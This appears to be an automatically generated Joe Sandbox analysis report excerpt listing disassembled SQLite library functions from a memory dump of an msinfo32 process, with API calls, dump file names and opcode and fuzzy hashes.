                                                                                                              • Opcode Fuzzy Hash: 226b3234f3498706fefb535ca2b881cf7a07e3b698f341132c56a11e30cf9068
                                                                                                              • Instruction Fuzzy Hash: 8C0128B5A083458BDB009FA9D4E0A1DB7E4BF45218F28C479EC488F319E772D8909B41
                                                                                                              Function 61E01440 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                              • String ID: _Jv_RegisterClasses$libgcj-16.dll
                                                                                                              • API String ID: 1646373207-328863460
                                                                                                              • Opcode ID: d30db84ec8ac5d6d2e6ade10c69e54bd89708476f124dd7e3e7c5668bf5a44c1
                                                                                                              • Instruction ID: 4ed8491c5429e169280950c786133b77b9689dde299cebfe0b2025ed4917afa8
                                                                                                              • Opcode Fuzzy Hash: d30db84ec8ac5d6d2e6ade10c69e54bd89708476f124dd7e3e7c5668bf5a44c1
                                                                                                              • Instruction Fuzzy Hash: 98E0E5B85187065BE7107FE5850672D7AB5EFC170AF62C85CD49146264E634C891C763
                                                                                                              Function 61E1E022 Relevance: 6.2, APIs: 4, Instructions: 229COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_malloc64.SQLITE3 ref: 61E1E091
                                                                                                                • Part of subcall function 61E19B06: sqlite3_initialize.SQLITE3 ref: 61E19B11
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E1E1A8
                                                                                                              • sqlite3_result_error_code.SQLITE3 ref: 61E1E2CB
                                                                                                              • sqlite3_result_double.SQLITE3 ref: 61E1E2E0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_freesqlite3_initializesqlite3_malloc64sqlite3_result_doublesqlite3_result_error_code
                                                                                                              • String ID:
                                                                                                              • API String ID: 129515768-0
                                                                                                              • Opcode ID: 64aebc32b2ddf912b062fddcbea2b52aba6affbeca95c01be6570ea9ffe120e3
                                                                                                              • Instruction ID: c7c954fc304d7ed6b6312b96e72aaae531cc05f16f81a9149eee35164d55c566
                                                                                                              • Opcode Fuzzy Hash: 64aebc32b2ddf912b062fddcbea2b52aba6affbeca95c01be6570ea9ffe120e3
                                                                                                              • Instruction Fuzzy Hash: D2A10770A08A19DFCB01DF69C585A9EBBF1FF88714F218429E849E7358EB30D951CB81
                                                                                                              Function 61E1DB63 Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: localtimesqlite3_mutex_entersqlite3_mutex_leavesqlite3_result_error
                                                                                                              • String ID:
                                                                                                              • API String ID: 2374424446-0
                                                                                                              • Opcode ID: af26f659b6e3b78102412e76deb3aba80f3065d5ccf61869eb15361b1e621019
                                                                                                              • Instruction ID: e0860600b7605354e29859a36a93117f36c2037d7751346f1f487fe8f1ea798f
                                                                                                              • Opcode Fuzzy Hash: af26f659b6e3b78102412e76deb3aba80f3065d5ccf61869eb15361b1e621019
                                                                                                              • Instruction Fuzzy Hash: 0751F674D08359CFEB20DFA8C884B9EBBF0BF45318F1085A9D448AB285D7759A85CF52
                                                                                                              Function 61E38549 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 61E19501: sqlite3_malloc.SQLITE3 ref: 61E1952E
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E38575
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              • sqlite3_stricmp.SQLITE3 ref: 61E385A8
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E38648
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_mallocsqlite3_mutex_entersqlite3_stricmp
                                                                                                              • String ID:
                                                                                                              • API String ID: 3567284914-0
                                                                                                              • Opcode ID: a32591994f778728343968e7f2e5ee82241f7c66da86095336977cececefc774
                                                                                                              • Instruction ID: 80496df2e39d00f17e0d77e72c70568ae34d74e4167a7a66f9ec3eac23f668bf
                                                                                                              • Opcode Fuzzy Hash: a32591994f778728343968e7f2e5ee82241f7c66da86095336977cececefc774
                                                                                                              • Instruction Fuzzy Hash: 3331F474E0462A9FDB00DFA9C480A9EBBF0FB88308F648569D855E7354D739E842DB91
                                                                                                              Function 61E1F283 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_malloc64.SQLITE3 ref: 61E1F2C3
                                                                                                                • Part of subcall function 61E19B06: sqlite3_initialize.SQLITE3 ref: 61E19B11
                                                                                                              • sqlite3_value_dup.SQLITE3 ref: 61E1F316
                                                                                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E1F34B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_initializesqlite3_malloc64sqlite3_result_error_nomemsqlite3_value_dup
                                                                                                              • String ID:
                                                                                                              • API String ID: 2961385374-0
                                                                                                              • Opcode ID: b2fc519dae4ab5629b6a5298150765c1bd7e8b619e2df3537bf576334a39ec8c
                                                                                                              • Instruction ID: 0dd16f40b23d2b67d6adfcb2bb75456bd2ec5b196f49e3d4b7901adc18e935d9
                                                                                                              • Opcode Fuzzy Hash: b2fc519dae4ab5629b6a5298150765c1bd7e8b619e2df3537bf576334a39ec8c
                                                                                                              • Instruction Fuzzy Hash: 36311AB5A042198FCB00DFA9C481ADEBBF1FF88310F258569E848EB315D735D951CB91
                                                                                                              Function 61E3CD4D Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_initialize.SQLITE3 ref: 61E3CD59
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E18D2E
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E20D02), ref: 61E18D62
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E1903A
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E3CD79
                                                                                                              • sqlite3_vfs_find.SQLITE3 ref: 61E3CDB8
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E3CEB7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializesqlite3_vfs_find
                                                                                                              • String ID:
                                                                                                              • API String ID: 321126751-0
                                                                                                              • Opcode ID: d7ee1f7c8bfa368c59526bac1a2e9dddc462db5702993c11d2255a90878355a3
                                                                                                              • Instruction ID: 8024b8bc392add355be346d6a89c4148c33045c6e8d773eb4feb169071035354
                                                                                                              • Opcode Fuzzy Hash: d7ee1f7c8bfa368c59526bac1a2e9dddc462db5702993c11d2255a90878355a3
                                                                                                              • Instruction Fuzzy Hash: 43414A34D1C6EC8EC7129B6885A47ED7FB9EB96B08F18C4DAD4C48B352C274C589CB61
                                                                                                              Function 61E2466B Relevance: 6.1, APIs: 4, Instructions: 85COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_snprintf$sqlite3_result_textsqlite3_value_blob
                                                                                                              • String ID:
                                                                                                              • API String ID: 3596987688-0
                                                                                                              • Opcode ID: 8837986b683dbcdb138a74be86808d7f2aac8329547d9d9aec4d86e68eeeff5b
                                                                                                              • Instruction ID: 16f372bbfebf70c5506e6a64a758026edece392c233e6825324f712069b634b3
                                                                                                              • Opcode Fuzzy Hash: 8837986b683dbcdb138a74be86808d7f2aac8329547d9d9aec4d86e68eeeff5b
                                                                                                              • Instruction Fuzzy Hash: 6C31D6B1A087469FC700DF69C88169EBBF0BB88364F24C92EE4A8D7350D738D8518F91
                                                                                                              Function 61E22482 Relevance: 6.1, APIs: 4, Instructions: 84COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_win32_is_nt.SQLITE3 ref: 61E224F8
                                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E22590
                                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E225B0
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E225B8
                                                                                                                • Part of subcall function 61E12C4A: sqlite3_free.SQLITE3 ref: 61E12CF0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_freesqlite3_snprintf$sqlite3_win32_is_nt
                                                                                                              • String ID:
                                                                                                              • API String ID: 4082161338-0
                                                                                                              • Opcode ID: c879b66f3fcbde6c4dfac43a323cb5b3b051f9c6c61004fd493787684f80b83c
                                                                                                              • Instruction ID: fbba5e48b8dce03b20cd34f9a189361d470f8261bbc58cb9e18f23ad9799108e
                                                                                                              • Opcode Fuzzy Hash: c879b66f3fcbde6c4dfac43a323cb5b3b051f9c6c61004fd493787684f80b83c
                                                                                                              • Instruction Fuzzy Hash: BE31C1B09183469FDB009FB9D46874EBBF4AF98348F60C81EE8989B340D778C4458F92
                                                                                                              Function 61E4AE81 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4AEB2
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4AEBA
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4AECD
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                                • Part of subcall function 61E09F8C: sqlite3_free.SQLITE3 ref: 61E09FA1
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4AF0B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_mutex_enter
                                                                                                              • String ID:
                                                                                                              • API String ID: 3930042888-0
                                                                                                              • Opcode ID: 35dcdcb1d35be14d022d2349e7acc7313b799e5f5bec2ed42b84bcbf31f04f94
                                                                                                              • Instruction ID: ca9b1e12da59ae79e347bb89cc3c37a38dceb189be8e5af156dbf599e39b16fa
                                                                                                              • Opcode Fuzzy Hash: 35dcdcb1d35be14d022d2349e7acc7313b799e5f5bec2ed42b84bcbf31f04f94
                                                                                                              • Instruction Fuzzy Hash: 352174B1A856058BDB14DFA5D4C055AB7F1BFC8324B25C43DE8169B315E734D8828B90
                                                                                                              Function 61E14588 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,?,00000000,?,61E146D2), ref: 61E145B6
                                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,00000000,?,61E146D2), ref: 61E1460D
                                                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,?,00000000,?,61E146D2), ref: 61E1462A
                                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,00000000,?,61E146D2), ref: 61E14651
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                              • String ID:
                                                                                                              • API String ID: 1477753154-0
                                                                                                              • Opcode ID: e57bcb4e4b6741c27bfbc0e079ba55c8a6da14032540c2e48df787fc45289724
                                                                                                              • Instruction ID: 6fb4fdc50b7a855ac78d4019932e20b78666cb4b31e3158c0d7183b334752404
                                                                                                              • Opcode Fuzzy Hash: e57bcb4e4b6741c27bfbc0e079ba55c8a6da14032540c2e48df787fc45289724
                                                                                                              • Instruction Fuzzy Hash: CD112971E68A59CFCB00AFA8C1C165D3BF4EB4A34CB25C82AE958CB345E774D8858B51
                                                                                                              Function 61E23DE5 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_stricmpsqlite3_value_text
                                                                                                              • String ID:
                                                                                                              • API String ID: 3779612131-0
                                                                                                              • Opcode ID: 02f172e633bae088b4c21521c825318f5d0303cf2e364dfd8f48b6292595fa85
                                                                                                              • Instruction ID: 325464c78bc40a05f301d2f53d74762217349661a574c058d741038749d3f81f
                                                                                                              • Opcode Fuzzy Hash: 02f172e633bae088b4c21521c825318f5d0303cf2e364dfd8f48b6292595fa85
                                                                                                              • Instruction Fuzzy Hash: 91111C756047899BCB00EF69C8856897BA0FB88364F64CA2DED788B380D335D555CF81
                                                                                                              Function 61E227F3 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_value_bytes$memmovesqlite3_aggregate_context
                                                                                                              • String ID:
                                                                                                              • API String ID: 1185593704-0
                                                                                                              • Opcode ID: 759bdbed815cf91d87e93129afb0876349149437daf34828f315e2d522be2dfa
                                                                                                              • Instruction ID: fd3a667adf079052b1f69e24342eec4e3e8db1c2b2b9f38d00bc5a123a6b844f
                                                                                                              • Opcode Fuzzy Hash: 759bdbed815cf91d87e93129afb0876349149437daf34828f315e2d522be2dfa
                                                                                                              • Instruction Fuzzy Hash: D4118F71A08745CFCB04DF78C88460ABBE0BF94318F15C86DE8988B315DBB4D844CB52
                                                                                                              Function 61E3A3D6 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E3A3EE
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E3A416
                                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3A427
                                                                                                                • Part of subcall function 61E386AE: sqlite3_initialize.SQLITE3 ref: 61E386B4
                                                                                                                • Part of subcall function 61E386AE: sqlite3_vmprintf.SQLITE3 ref: 61E386CE
                                                                                                              • sqlite3_create_function_v2.SQLITE3 ref: 61E3A46C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
